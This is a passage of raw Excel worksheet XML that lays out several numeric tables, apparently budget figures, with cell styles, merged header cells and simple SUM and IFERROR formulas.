  <pageMargins left="0.751388888888889" right="0.751388888888889" top="1" bottom="1" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" orientation="landscape"/>
  <headerFooter/>
</worksheet>
</file>

<file path=xl/worksheets/sheet6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3" tint="0.799981688894314"/>
  </sheetPr>
  <dimension ref="A1:O7"/>
  <sheetViews>
    <sheetView view="pageBreakPreview" zoomScale="115" zoomScaleNormal="100" zoomScaleSheetLayoutView="115" workbookViewId="0">
      <pane xSplit="2" ySplit="5" topLeftCell="C6" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="B4" sqref="B4:E6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10" defaultRowHeight="15.6" outlineLevelRow="6"/>
  <cols>
    <col min="1" max="1" width="17.8425925925926" style="184" customWidth="1"/>
    <col min="2" max="5" width="17" style="184" customWidth="1"/>
    <col min="6" max="16384" width="10" style="184"/>
  </cols>
  <sheetData>
    <row r="1" ht="18" customHeight="1" spans="1:5">
      <c r="A1" s="186" t="s">
        <v>2222</v>
      </c>
      <c r="B1" s="317"/>
      <c r="C1" s="317"/>
      <c r="D1" s="318"/>
      <c r="E1" s="318"/>
    </row>
    <row r="2" ht="28.15" customHeight="1" spans="1:5">
      <c r="A2" s="301" t="s">
        <v>2223</v>
      </c>
      <c r="B2" s="301"/>
      <c r="C2" s="301"/>
      <c r="D2" s="301"/>
      <c r="E2" s="301"/>
    </row>
    <row r="3" ht="19.15" customHeight="1" spans="1:5">
      <c r="A3" s="302"/>
      <c r="B3" s="302"/>
      <c r="C3" s="302"/>
      <c r="D3" s="302"/>
      <c r="E3" s="211" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="4" ht="44.45" customHeight="1" spans="1:5">
      <c r="A4" s="305" t="s">
        <v>812</v>
      </c>
      <c r="B4" s="305" t="s">
        <v>2224</v>
      </c>
      <c r="C4" s="305" t="s">
        <v>2225</v>
      </c>
      <c r="D4" s="305" t="s">
        <v>2226</v>
      </c>
      <c r="E4" s="305" t="s">
        <v>2227</v>
      </c>
    </row>
    <row r="5" ht="30" customHeight="1" spans="1:15">
      <c r="A5" s="312" t="s">
        <v>2194</v>
      </c>
      <c r="B5" s="311">
        <v>784090</v>
      </c>
      <c r="C5" s="311">
        <v>137500</v>
      </c>
      <c r="D5" s="319">
        <v>1047550</v>
      </c>
      <c r="E5" s="319">
        <v>983590</v>
      </c>
      <c r="G5" s="316"/>
      <c r="H5" s="316"/>
      <c r="I5" s="316"/>
      <c r="J5" s="316"/>
      <c r="L5" s="316"/>
      <c r="M5" s="316"/>
      <c r="N5" s="316"/>
      <c r="O5" s="316"/>
    </row>
    <row r="6" ht="30" customHeight="1" spans="1:15">
      <c r="A6" s="312" t="s">
        <v>2195</v>
      </c>
      <c r="B6" s="313">
        <v>784090</v>
      </c>
      <c r="C6" s="313">
        <v>137500</v>
      </c>
      <c r="D6" s="320">
        <v>1047550</v>
      </c>
      <c r="E6" s="320">
        <v>983590</v>
      </c>
      <c r="G6" s="316"/>
      <c r="H6" s="316"/>
      <c r="I6" s="316"/>
      <c r="J6" s="316"/>
      <c r="L6" s="316"/>
      <c r="M6" s="316"/>
      <c r="N6" s="316"/>
      <c r="O6" s="316"/>
    </row>
    <row r="7" ht="14.4" spans="1:5">
      <c r="A7" s="321"/>
      <c r="B7" s="321"/>
      <c r="C7" s="321"/>
      <c r="D7" s="321"/>
      <c r="E7" s="321"/>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="A2:E2"/>
  </mergeCells>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.51" footer="0.51"/>
  <pageSetup paperSize="9" orientation="portrait"/>
  <headerFooter/>
</worksheet>
</file>

<file path=xl/worksheets/sheet6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3" tint="0.799981688894314"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:Y10"/>
  <sheetViews>
    <sheetView view="pageBreakPreview" zoomScaleNormal="100" zoomScaleSheetLayoutView="100" workbookViewId="0">
      <pane xSplit="2" ySplit="6" topLeftCell="C7" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="F6" sqref="F6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10" defaultRowHeight="15.6"/>
  <cols>
    <col min="1" max="1" width="12.1481481481481" style="184" customWidth="1"/>
    <col min="2" max="3" width="11.8425925925926" style="184" customWidth="1"/>
    <col min="4" max="4" width="10.7222222222222" style="184" customWidth="1"/>
    <col min="5" max="5" width="12.7222222222222" style="184" customWidth="1"/>
    <col min="6" max="6" width="11.8425925925926" style="184" customWidth="1"/>
    <col min="7" max="7" width="12.1481481481481" style="184" customWidth="1"/>
    <col min="8" max="8" width="10.5740740740741" style="184" customWidth="1"/>
    <col min="9" max="9" width="10" style="184"/>
    <col min="10" max="10" width="10.2777777777778" style="184" customWidth="1"/>
    <col min="11" max="11" width="10" style="184"/>
    <col min="12" max="12" width="11.2777777777778" style="184" customWidth="1"/>
    <col min="13" max="16384" width="10" style="184"/>
  </cols>
  <sheetData>
    <row r="1" ht="18" customHeight="1" spans="1:8">
      <c r="A1" s="186" t="s">
        <v>2228</v>
      </c>
      <c r="B1" s="300"/>
      <c r="C1" s="300"/>
      <c r="D1" s="300"/>
      <c r="E1" s="300"/>
      <c r="F1" s="300"/>
      <c r="G1" s="300"/>
      <c r="H1" s="300"/>
    </row>
    <row r="2" ht="28.15" customHeight="1" spans="1:8">
      <c r="A2" s="301" t="s">
        <v>2229</v>
      </c>
      <c r="B2" s="301"/>
      <c r="C2" s="301"/>
      <c r="D2" s="301"/>
      <c r="E2" s="301"/>
      <c r="F2" s="301"/>
      <c r="G2" s="301"/>
      <c r="H2" s="301"/>
    </row>
    <row r="3" ht="24" customHeight="1" spans="1:8">
      <c r="A3" s="302"/>
      <c r="B3" s="303"/>
      <c r="C3" s="303"/>
      <c r="D3" s="304"/>
      <c r="E3" s="304"/>
      <c r="F3" s="304"/>
      <c r="G3" s="304"/>
      <c r="H3" s="211" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="4" ht="27.6" customHeight="1" spans="1:8">
      <c r="A4" s="305" t="s">
        <v>812</v>
      </c>
      <c r="B4" s="306" t="s">
        <v>704</v>
      </c>
      <c r="C4" s="307" t="s">
        <v>2230</v>
      </c>
      <c r="D4" s="308"/>
      <c r="E4" s="309"/>
      <c r="F4" s="306" t="s">
        <v>2231</v>
      </c>
      <c r="G4" s="306"/>
      <c r="H4" s="306"/>
    </row>
    <row r="5" ht="42" customHeight="1" spans="1:8">
      <c r="A5" s="305"/>
      <c r="B5" s="306"/>
      <c r="C5" s="306" t="s">
        <v>2232</v>
      </c>
      <c r="D5" s="306" t="s">
        <v>2233</v>
      </c>
      <c r="E5" s="306" t="s">
        <v>2234</v>
      </c>
      <c r="F5" s="306" t="s">
        <v>2232</v>
      </c>
      <c r="G5" s="306" t="s">
        <v>2235</v>
      </c>
      <c r="H5" s="306" t="s">
        <v>2236</v>
      </c>
    </row>
    <row r="6" ht="30" customHeight="1" spans="1:25">
      <c r="A6" s="310" t="s">
        <v>2194</v>
      </c>
      <c r="B6" s="311">
        <v>206640</v>
      </c>
      <c r="C6" s="311">
        <v>7140</v>
      </c>
      <c r="D6" s="311">
        <v>0</v>
      </c>
      <c r="E6" s="311">
        <v>7140</v>
      </c>
      <c r="F6" s="311">
        <v>199500</v>
      </c>
      <c r="G6" s="311">
        <v>140500</v>
      </c>
      <c r="H6" s="311">
        <v>59000</v>
      </c>
      <c r="J6" s="315"/>
      <c r="K6" s="316"/>
      <c r="L6" s="316"/>
      <c r="M6" s="316"/>
      <c r="N6" s="316"/>
      <c r="O6" s="316"/>
      <c r="P6" s="316"/>
      <c r="Q6" s="316"/>
      <c r="S6" s="316">
        <v>0</v>
      </c>
      <c r="T6" s="316">
        <v>0</v>
      </c>
      <c r="U6" s="316">
        <v>0</v>
      </c>
      <c r="V6" s="316">
        <v>0</v>
      </c>
      <c r="W6" s="316">
        <v>0</v>
      </c>
      <c r="X6" s="316">
        <v>0</v>
      </c>
      <c r="Y6" s="316" t="e">
        <v>#VALUE!</v>
      </c>
    </row>
    <row r="7" ht="30" customHeight="1" spans="1:25">
      <c r="A7" s="312" t="s">
        <v>2195</v>
      </c>
      <c r="B7" s="313">
        <v>206640</v>
      </c>
      <c r="C7" s="313">
        <v>7140</v>
      </c>
      <c r="D7" s="313">
        <v>0</v>
      </c>
      <c r="E7" s="313">
        <v>7140</v>
      </c>
      <c r="F7" s="313">
        <v>199500</v>
      </c>
      <c r="G7" s="313">
        <v>140500</v>
      </c>
      <c r="H7" s="313">
        <v>59000</v>
      </c>
      <c r="K7" s="316"/>
      <c r="L7" s="316"/>
      <c r="M7" s="316"/>
      <c r="N7" s="316"/>
      <c r="O7" s="316"/>
      <c r="P7" s="316"/>
      <c r="Q7" s="316"/>
      <c r="S7" s="316">
        <v>0</v>
      </c>
      <c r="T7" s="316">
        <v>0</v>
      </c>
      <c r="U7" s="316">
        <v>0</v>
      </c>
      <c r="V7" s="316">
        <v>0</v>
      </c>
      <c r="W7" s="316">
        <v>0</v>
      </c>
      <c r="X7" s="316">
        <v>0</v>
      </c>
      <c r="Y7" s="316">
        <v>0</v>
      </c>
    </row>
    <row r="8" spans="2:8">
      <c r="B8" s="314"/>
      <c r="C8" s="314"/>
      <c r="D8" s="314"/>
      <c r="E8" s="314"/>
      <c r="F8" s="314"/>
      <c r="G8" s="314"/>
      <c r="H8" s="314"/>
    </row>
    <row r="9" spans="2:8">
      <c r="B9" s="314"/>
      <c r="C9" s="314"/>
      <c r="D9" s="314"/>
      <c r="E9" s="314"/>
      <c r="F9" s="314"/>
      <c r="G9" s="314"/>
      <c r="H9" s="314"/>
    </row>
    <row r="10" spans="2:8">
      <c r="B10" s="314"/>
      <c r="C10" s="314"/>
      <c r="D10" s="314"/>
      <c r="E10" s="314"/>
      <c r="F10" s="314"/>
      <c r="G10" s="314"/>
      <c r="H10" s="314"/>
    </row>
  </sheetData>
  <mergeCells count="5">
    <mergeCell ref="A2:H2"/>
    <mergeCell ref="C4:E4"/>
    <mergeCell ref="F4:H4"/>
    <mergeCell ref="A4:A5"/>
    <mergeCell ref="B4:B5"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.51" footer="0.51"/>
  <pageSetup paperSize="9" orientation="portrait"/>
  <headerFooter/>
</worksheet>
</file>

<file path=xl/worksheets/sheet6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3" tint="0.799981688894314"/>
  </sheetPr>
  <dimension ref="A1:I12"/>
  <sheetViews>
    <sheetView view="pageBreakPreview" zoomScale="115" zoomScaleNormal="100" zoomScaleSheetLayoutView="115" workbookViewId="0">
      <pane xSplit="2" ySplit="6" topLeftCell="C7" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="D4" sqref="D4:H4"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="13.2"/>
  <cols>
    <col min="1" max="1" width="12.7222222222222" style="238" customWidth="1"/>
    <col min="2" max="2" width="15.7222222222222" style="238" customWidth="1"/>
    <col min="3" max="8" width="13.7222222222222" style="238" customWidth="1"/>
    <col min="9" max="9" width="15.7222222222222" style="238" customWidth="1"/>
    <col min="10" max="16384" width="9" style="238"/>
  </cols>
  <sheetData>
    <row r="1" ht="17.4" spans="1:1">
      <c r="A1" s="186" t="s">
        <v>2237</v>
      </c>
    </row>
    <row r="2" ht="24" spans="1:9">
      <c r="A2" s="293" t="s">
        <v>2238</v>
      </c>
      <c r="B2" s="294"/>
      <c r="C2" s="294"/>
      <c r="D2" s="294"/>
      <c r="E2" s="294"/>
      <c r="F2" s="294"/>
      <c r="G2" s="294"/>
      <c r="H2" s="294"/>
      <c r="I2" s="294"/>
    </row>
    <row r="3" ht="21.95" customHeight="1" spans="1:9">
      <c r="A3" s="295"/>
      <c r="B3" s="295"/>
      <c r="C3" s="295"/>
      <c r="D3" s="295"/>
      <c r="E3" s="295"/>
      <c r="F3" s="295"/>
      <c r="G3" s="295"/>
      <c r="H3" s="264"/>
      <c r="I3" s="211" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="4" ht="50.1" customHeight="1" spans="1:9">
      <c r="A4" s="242" t="s">
        <v>2239</v>
      </c>
      <c r="B4" s="242" t="s">
        <v>2240</v>
      </c>
      <c r="C4" s="242" t="s">
        <v>2241</v>
      </c>
      <c r="D4" s="242" t="s">
        <v>2242</v>
      </c>
      <c r="E4" s="242" t="s">
        <v>2243</v>
      </c>
      <c r="F4" s="242" t="s">
        <v>2244</v>
      </c>
      <c r="G4" s="242" t="s">
        <v>2245</v>
      </c>
      <c r="H4" s="242" t="s">
        <v>2246</v>
      </c>
      <c r="I4" s="242" t="s">
        <v>2247</v>
      </c>
    </row>
    <row r="5" ht="30" customHeight="1" spans="1:9">
      <c r="A5" s="296" t="s">
        <v>2248</v>
      </c>
      <c r="B5" s="297" t="s">
        <v>2249</v>
      </c>
      <c r="C5" s="297">
        <f t="shared" ref="C5:H5" si="0">C6+C7+C8</f>
        <v>145460</v>
      </c>
      <c r="D5" s="297">
        <f t="shared" si="0"/>
        <v>26640</v>
      </c>
      <c r="E5" s="297">
        <f t="shared" si="0"/>
        <v>2900</v>
      </c>
      <c r="F5" s="297">
        <f t="shared" si="0"/>
        <v>24300</v>
      </c>
      <c r="G5" s="297">
        <f t="shared" si="0"/>
        <v>32600</v>
      </c>
      <c r="H5" s="297">
        <f t="shared" si="0"/>
        <v>59020</v>
      </c>
      <c r="I5" s="299" t="s">
        <v>2250</v>
      </c>
    </row>
    <row r="6" ht="30" customHeight="1" spans="1:9">
      <c r="A6" s="296"/>
      <c r="B6" s="298" t="s">
        <v>2251</v>
      </c>
      <c r="C6" s="298">
        <f t="shared" ref="C6:C8" si="1">D6+E6+F6+G6+H6</f>
        <v>2000</v>
      </c>
      <c r="D6" s="298">
        <v>1000</v>
      </c>
      <c r="E6" s="298"/>
      <c r="F6" s="298"/>
      <c r="G6" s="298"/>
      <c r="H6" s="298">
        <v>1000</v>
      </c>
      <c r="I6" s="299"/>
    </row>
    <row r="7" ht="30" customHeight="1" spans="1:9">
      <c r="A7" s="296"/>
      <c r="B7" s="298" t="s">
        <v>2252</v>
      </c>
      <c r="C7" s="298">
        <f t="shared" si="1"/>
        <v>13140</v>
      </c>
      <c r="D7" s="298">
        <v>10240</v>
      </c>
      <c r="E7" s="298">
        <v>2900</v>
      </c>
      <c r="F7" s="298"/>
      <c r="G7" s="298"/>
      <c r="H7" s="298"/>
      <c r="I7" s="299"/>
    </row>
    <row r="8" ht="30" customHeight="1" spans="1:9">
      <c r="A8" s="296"/>
      <c r="B8" s="298" t="s">
        <v>2253</v>
      </c>
      <c r="C8" s="298">
        <f t="shared" si="1"/>
        <v>130320</v>
      </c>
      <c r="D8" s="298">
        <v>15400</v>
      </c>
      <c r="E8" s="298"/>
      <c r="F8" s="298">
        <v>24300</v>
      </c>
      <c r="G8" s="298">
        <v>32600</v>
      </c>
      <c r="H8" s="298">
        <v>58020</v>
      </c>
      <c r="I8" s="299"/>
    </row>
    <row r="9" ht="30" customHeight="1" spans="1:9">
      <c r="A9" s="296" t="s">
        <v>2254</v>
      </c>
      <c r="B9" s="297" t="s">
        <v>2249</v>
      </c>
      <c r="C9" s="297">
        <f t="shared" ref="C9:H9" si="2">C10+C11+C12</f>
        <v>983590</v>
      </c>
      <c r="D9" s="297">
        <f t="shared" si="2"/>
        <v>18220</v>
      </c>
      <c r="E9" s="297">
        <f t="shared" si="2"/>
        <v>33200</v>
      </c>
      <c r="F9" s="297">
        <f t="shared" si="2"/>
        <v>85900</v>
      </c>
      <c r="G9" s="297">
        <f t="shared" si="2"/>
        <v>110900</v>
      </c>
      <c r="H9" s="297">
        <f t="shared" si="2"/>
        <v>735370</v>
      </c>
      <c r="I9" s="299" t="s">
        <v>2255</v>
      </c>
    </row>
    <row r="10" ht="30" customHeight="1" spans="1:9">
      <c r="A10" s="296"/>
      <c r="B10" s="298" t="s">
        <v>2251</v>
      </c>
      <c r="C10" s="298">
        <f t="shared" ref="C10:C12" si="3">D10+E10+F10+G10+H10</f>
        <v>713800</v>
      </c>
      <c r="D10" s="298">
        <v>2200</v>
      </c>
      <c r="E10" s="298">
        <v>33200</v>
      </c>
      <c r="F10" s="298">
        <v>62900</v>
      </c>
      <c r="G10" s="298">
        <v>79900</v>
      </c>
      <c r="H10" s="298">
        <v>535600</v>
      </c>
      <c r="I10" s="299"/>
    </row>
    <row r="11" ht="30" customHeight="1" spans="1:9">
      <c r="A11" s="296"/>
      <c r="B11" s="298" t="s">
        <v>2252</v>
      </c>
      <c r="C11" s="298">
        <f t="shared" si="3"/>
        <v>11020</v>
      </c>
      <c r="D11" s="298">
        <v>11020</v>
      </c>
      <c r="E11" s="298"/>
      <c r="F11" s="298"/>
      <c r="G11" s="298"/>
      <c r="H11" s="298"/>
      <c r="I11" s="299"/>
    </row>
    <row r="12" ht="30" customHeight="1" spans="1:9">
      <c r="A12" s="296"/>
      <c r="B12" s="298" t="s">
        <v>2253</v>
      </c>
      <c r="C12" s="298">
        <f t="shared" si="3"/>
        <v>258770</v>
      </c>
      <c r="D12" s="298">
        <v>5000</v>
      </c>
      <c r="E12" s="298"/>
      <c r="F12" s="298">
        <v>23000</v>
      </c>
      <c r="G12" s="298">
        <v>31000</v>
      </c>
      <c r="H12" s="298">
        <v>199770</v>
      </c>
      <c r="I12" s="299"/>
    </row>
  </sheetData>
  <mergeCells count="4">
    <mergeCell ref="A5:A8"/>
    <mergeCell ref="A9:A12"/>
    <mergeCell ref="I5:I8"/>
    <mergeCell ref="I9:I12"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.751388888888889" right="0.751388888888889" top="1" bottom="1" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" orientation="landscape"/>
  <headerFooter/>
</worksheet>
</file>

<file path=xl/worksheets/sheet6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3" tint="0.799981688894314"/>
  </sheetPr>
  <dimension ref="A1:F22"/>
  <sheetViews>
    <sheetView view="pageBreakPreview" zoomScaleNormal="100" zoomScaleSheetLayoutView="100" workbookViewId="0">
      <pane xSplit="1" ySplit="6" topLeftCell="B7" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="G13" sqref="G13"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.14814814814815" defaultRowHeight="13.2" outlineLevelCol="5"/>
  <cols>
    <col min="1" max="1" width="48" customWidth="1"/>
    <col min="2" max="6" width="11" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" ht="17.4" spans="1:3">
      <c r="A1" s="186" t="s">
        <v>2256</v>
      </c>
      <c r="B1" s="218"/>
      <c r="C1" s="218"/>
    </row>
    <row r="2" ht="24" spans="1:6">
      <c r="A2" s="282" t="s">
        <v>2257</v>
      </c>
      <c r="B2" s="282"/>
      <c r="C2" s="282"/>
      <c r="D2" s="282"/>
      <c r="E2" s="282"/>
      <c r="F2" s="282"/>
    </row>
    <row r="3" ht="21.95" customHeight="1" spans="1:6">
      <c r="A3" s="220"/>
      <c r="B3" s="220"/>
      <c r="F3" s="211" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="4" ht="27" customHeight="1" spans="1:6">
      <c r="A4" s="192" t="s">
        <v>2168</v>
      </c>
      <c r="B4" s="192" t="s">
        <v>704</v>
      </c>
      <c r="C4" s="192" t="s">
        <v>2258</v>
      </c>
      <c r="D4" s="192"/>
      <c r="E4" s="192"/>
      <c r="F4" s="283" t="s">
        <v>2259</v>
      </c>
    </row>
    <row r="5" ht="27" customHeight="1" spans="1:6">
      <c r="A5" s="192"/>
      <c r="B5" s="284"/>
      <c r="C5" s="192"/>
      <c r="D5" s="285" t="s">
        <v>2248</v>
      </c>
      <c r="E5" s="285" t="s">
        <v>2254</v>
      </c>
      <c r="F5" s="286"/>
    </row>
    <row r="6" ht="27.95" customHeight="1" spans="1:6">
      <c r="A6" s="287" t="s">
        <v>2260</v>
      </c>
      <c r="B6" s="225">
        <v>37000</v>
      </c>
      <c r="C6" s="229">
        <v>37000</v>
      </c>
      <c r="D6" s="229"/>
      <c r="E6" s="229">
        <v>37000</v>
      </c>
      <c r="F6" s="288"/>
    </row>
    <row r="7" ht="27.95" customHeight="1" spans="1:6">
      <c r="A7" s="287" t="s">
        <v>2261</v>
      </c>
      <c r="B7" s="228">
        <v>19400</v>
      </c>
      <c r="C7" s="229">
        <v>19400</v>
      </c>
      <c r="D7" s="229"/>
      <c r="E7" s="229">
        <v>19400</v>
      </c>
      <c r="F7" s="289"/>
    </row>
    <row r="8" ht="27.95" customHeight="1" spans="1:6">
      <c r="A8" s="287" t="s">
        <v>2262</v>
      </c>
      <c r="B8" s="228">
        <v>17000</v>
      </c>
      <c r="C8" s="229">
        <v>17000</v>
      </c>
      <c r="D8" s="229"/>
      <c r="E8" s="229">
        <v>17000</v>
      </c>
      <c r="F8" s="289"/>
    </row>
    <row r="9" ht="27.95" customHeight="1" spans="1:6">
      <c r="A9" s="287" t="s">
        <v>2263</v>
      </c>
      <c r="B9" s="228">
        <v>10000</v>
      </c>
      <c r="C9" s="229">
        <v>10000</v>
      </c>
      <c r="D9" s="229"/>
      <c r="E9" s="229">
        <v>10000</v>
      </c>
      <c r="F9" s="289"/>
    </row>
    <row r="10" ht="27.95" customHeight="1" spans="1:6">
      <c r="A10" s="287" t="s">
        <v>2264</v>
      </c>
      <c r="B10" s="228">
        <v>10000</v>
      </c>
      <c r="C10" s="229">
        <v>10000</v>
      </c>
      <c r="D10" s="229"/>
      <c r="E10" s="229">
        <v>10000</v>
      </c>
      <c r="F10" s="289"/>
    </row>
    <row r="11" ht="27.95" customHeight="1" spans="1:6">
      <c r="A11" s="287" t="s">
        <v>2265</v>
      </c>
      <c r="B11" s="228">
        <v>10000</v>
      </c>
      <c r="C11" s="229">
        <v>10000</v>
      </c>
      <c r="D11" s="229"/>
      <c r="E11" s="229">
        <v>10000</v>
      </c>
      <c r="F11" s="289"/>
    </row>
    <row r="12" ht="27.95" customHeight="1" spans="1:6">
      <c r="A12" s="287" t="s">
        <v>2266</v>
      </c>
      <c r="B12" s="228">
        <v>8300</v>
      </c>
      <c r="C12" s="229">
        <v>8300</v>
      </c>
      <c r="D12" s="229"/>
      <c r="E12" s="229">
        <v>8300</v>
      </c>
      <c r="F12" s="289"/>
    </row>
    <row r="13" ht="27.95" customHeight="1" spans="1:6">
      <c r="A13" s="287" t="s">
        <v>2267</v>
      </c>
      <c r="B13" s="228">
        <v>7100</v>
      </c>
      <c r="C13" s="229">
        <v>7100</v>
      </c>
      <c r="D13" s="229"/>
      <c r="E13" s="229">
        <v>7100</v>
      </c>
      <c r="F13" s="289"/>
    </row>
    <row r="14" ht="27.95" customHeight="1" spans="1:6">
      <c r="A14" s="287" t="s">
        <v>2268</v>
      </c>
      <c r="B14" s="228">
        <v>6400</v>
      </c>
      <c r="C14" s="229">
        <v>6400</v>
      </c>
      <c r="D14" s="229"/>
      <c r="E14" s="229">
        <v>6400</v>
      </c>
      <c r="F14" s="289"/>
    </row>
    <row r="15" ht="27.95" customHeight="1" spans="1:6">
      <c r="A15" s="287" t="s">
        <v>2269</v>
      </c>
      <c r="B15" s="228">
        <v>5500</v>
      </c>
      <c r="C15" s="229">
        <v>5500</v>
      </c>
      <c r="D15" s="229"/>
      <c r="E15" s="229">
        <v>5500</v>
      </c>
      <c r="F15" s="289"/>
    </row>
    <row r="16" ht="27.95" customHeight="1" spans="1:6">
      <c r="A16" s="287" t="s">
        <v>2270</v>
      </c>
      <c r="B16" s="228">
        <v>3800</v>
      </c>
      <c r="C16" s="229">
        <v>3800</v>
      </c>
      <c r="D16" s="229"/>
      <c r="E16" s="229">
        <v>3800</v>
      </c>
      <c r="F16" s="289"/>
    </row>
    <row r="17" ht="27.95" customHeight="1" spans="1:6">
      <c r="A17" s="287" t="s">
        <v>2271</v>
      </c>
      <c r="B17" s="228">
        <v>2500</v>
      </c>
      <c r="C17" s="229">
        <v>2500</v>
      </c>
      <c r="D17" s="229"/>
      <c r="E17" s="229">
        <v>2500</v>
      </c>
      <c r="F17" s="289"/>
    </row>
    <row r="18" ht="27.95" customHeight="1" spans="1:6">
      <c r="A18" s="287" t="s">
        <v>2272</v>
      </c>
      <c r="B18" s="228">
        <v>1500</v>
      </c>
      <c r="C18" s="229">
        <v>1500</v>
      </c>
      <c r="D18" s="229"/>
      <c r="E18" s="229">
        <v>1500</v>
      </c>
      <c r="F18" s="289"/>
    </row>
    <row r="19" ht="27.95" customHeight="1" spans="1:6">
      <c r="A19" s="287" t="s">
        <v>2273</v>
      </c>
      <c r="B19" s="228">
        <v>1500</v>
      </c>
      <c r="C19" s="229">
        <v>1500</v>
      </c>
      <c r="D19" s="229"/>
      <c r="E19" s="229">
        <v>1500</v>
      </c>
      <c r="F19" s="289"/>
    </row>
    <row r="20" ht="27.95" customHeight="1" spans="1:6">
      <c r="A20" s="287" t="s">
        <v>2274</v>
      </c>
      <c r="B20" s="228">
        <v>200</v>
      </c>
      <c r="C20" s="229">
        <v>200</v>
      </c>
      <c r="D20" s="229"/>
      <c r="E20" s="229">
        <v>200</v>
      </c>
      <c r="F20" s="289"/>
    </row>
    <row r="21" ht="27.95" customHeight="1" spans="1:6">
      <c r="A21" s="287" t="s">
        <v>2275</v>
      </c>
      <c r="B21" s="228">
        <v>300</v>
      </c>
      <c r="C21" s="229">
        <v>300</v>
      </c>
      <c r="D21" s="229"/>
      <c r="E21" s="229">
        <v>300</v>
      </c>
      <c r="F21" s="289"/>
    </row>
    <row r="22" ht="27.95" customHeight="1" spans="1:6">
      <c r="A22" s="290" t="s">
        <v>2276</v>
      </c>
      <c r="B22" s="291">
        <f>SUM(B6:B21)</f>
        <v>140500</v>
      </c>
      <c r="C22" s="291">
        <f>SUM(C6:C21)</f>
        <v>140500</v>
      </c>
      <c r="D22" s="291"/>
      <c r="E22" s="291">
        <f>SUM(E6:E21)</f>
        <v>140500</v>
      </c>
      <c r="F22" s="292"/>
    </row>
  </sheetData>
  <mergeCells count="5">
    <mergeCell ref="A2:F2"/>
    <mergeCell ref="C4:E4"/>
    <mergeCell ref="A4:A5"/>
    <mergeCell ref="B4:B5"/>
    <mergeCell ref="F4:F5"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.196527777777778" right="0.393055555555556" top="0.786805555555556" bottom="0.786805555555556" header="0.5" footer="0.5"/>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6"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:F41"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="1" ySplit="6" topLeftCell="B7" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="G1" sqref="G$1:J$1048576"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.2777777777778" defaultRowHeight="15.6" outlineLevelCol="5"/>
  <cols>
    <col min="1" max="1" width="36" style="968" customWidth="1"/>
    <col min="2" max="2" width="10.2777777777778" style="968"/>
    <col min="3" max="3" width="12.2222222222222" style="968" customWidth="1"/>
    <col min="4" max="4" width="10.2777777777778" style="968"/>
    <col min="5" max="6" width="12.1481481481481" style="968" customWidth="1"/>
    <col min="7" max="16384" width="10.2777777777778" style="968"/>
  </cols>
  <sheetData>
    <row r="1" ht="21" customHeight="1" spans="1:1">
      <c r="A1" s="1157" t="s">
        <v>418</v>
      </c>
    </row>
    <row r="2" ht="26.4" spans="1:6">
      <c r="A2" s="998" t="s">
        <v>212</v>
      </c>
      <c r="B2" s="998"/>
      <c r="C2" s="998"/>
      <c r="D2" s="998"/>
      <c r="E2" s="998"/>
      <c r="F2" s="998"/>
    </row>
    <row r="3" ht="15.75" customHeight="1" spans="6:6">
      <c r="F3" s="1059" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="4" s="694" customFormat="1" ht="15" customHeight="1" spans="1:6">
      <c r="A4" s="972" t="s">
        <v>374</v>
      </c>
      <c r="B4" s="1060" t="s">
        <v>375</v>
      </c>
      <c r="C4" s="1158" t="s">
        <v>376</v>
      </c>
      <c r="D4" s="987" t="s">
        <v>377</v>
      </c>
      <c r="E4" s="1158"/>
      <c r="F4" s="1060"/>
    </row>
    <row r="5" s="694" customFormat="1" ht="24" spans="1:6">
      <c r="A5" s="1061"/>
      <c r="B5" s="1062"/>
      <c r="C5" s="1159"/>
      <c r="D5" s="972" t="s">
        <v>378</v>
      </c>
      <c r="E5" s="1118" t="s">
        <v>379</v>
      </c>
      <c r="F5" s="972" t="s">
        <v>380</v>
      </c>
    </row>
    <row r="6" ht="18" customHeight="1" spans="1:6">
      <c r="A6" s="1063" t="s">
        <v>419</v>
      </c>
      <c r="B6" s="775">
        <v>46574</v>
      </c>
      <c r="C6" s="775">
        <v>47494</v>
      </c>
      <c r="D6" s="1022">
        <v>45099</v>
      </c>
      <c r="E6" s="1160">
        <f>IFERROR(D6/C6*100,"-")</f>
        <v>94.9572577588748</v>
      </c>
      <c r="F6" s="1065">
        <f>IFERROR((D6-B6)/B6*100,"-")</f>
        <v>-3.16700304891141</v>
      </c>
    </row>
    <row r="7" ht="18" customHeight="1" spans="1:6">
      <c r="A7" s="1063" t="s">
        <v>420</v>
      </c>
      <c r="B7" s="775"/>
